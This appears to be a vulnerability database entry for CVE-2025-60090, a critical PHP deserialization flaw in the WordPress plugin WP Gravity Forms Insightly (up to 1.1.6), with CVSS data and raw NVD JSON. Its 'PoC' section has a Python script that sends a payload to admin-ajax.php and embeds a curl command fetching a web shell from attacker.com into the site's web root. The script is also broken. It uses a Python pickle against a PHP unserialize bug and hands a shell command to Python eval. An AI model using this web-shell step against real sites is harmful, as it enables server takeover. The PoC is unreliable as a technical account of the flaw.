Security Vulnerability Report
中文
CVE-2025-60090 CVSS 9.8 CRITICAL

CVE-2025-60090

Published: 2025-12-18 08:16:09
Last Modified: 2026-01-20 15:17:27

Description

Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Insightly gf-insightly allows Object Injection.This issue affects WP Gravity Forms Insightly: from n/a through <= 1.1.6.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crmperks:wp_gravity_forms_insightly:*:*:*:*:*:wordpress:*:* - VULNERABLE
WP Gravity Forms Insightly (gf-insightly) <= 1.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 # CVE-2025-60090 PoC - WP Gravity Forms Insightly Object Injection # This PoC demonstrates how to inject a malicious serialized object target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Construct malicious serialized payload targeting PHP unserialize vulnerability # This payload uses a common POP chain technique class Payload: def __reduce__(self): # This will execute a system command when deserialized cmd = "curl https://attacker.com/shell.php -o /var/www/html/shell.php" return (eval, (cmd,)) import pickle import sys # Generate the malicious serialized object payload = pickle.dumps(Payload()) encoded_payload = base64.b64encode(payload).decode() # Prepare the exploit request data = { "action": "gf_insightly_submit", "form_id": "1", "gf_insightly_data": encoded_payload, } # Send the exploit response = requests.post(target_url, data=data, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") print(f"Payload sent: {encoded_payload[:100]}...") # Note: Actual exploitation requires identifying the vulnerable unserialize() call # and finding a suitable POP chain in the plugin or WordPress environment

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60090", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:09.220", "lastModified": "2026-01-20T15:17:27.453", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Insightly gf-insightly allows Object Injection.This issue affects WP Gravity Forms Insightly: from n/a through <= 1.1.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmperks:wp_gravity_forms_insightly:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.1.7", "matchCriteriaId": "9D916B3F-D0C5-4CE2-84CE-EBFB136BF6B2"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-insightly/vulnerability/wordpress-wp-gravity-forms-insightly-plugin-1-1-5-deserialization-of-untrusted-data-vulnerability?_s_id=cve", "source": "[email protected]"}]}}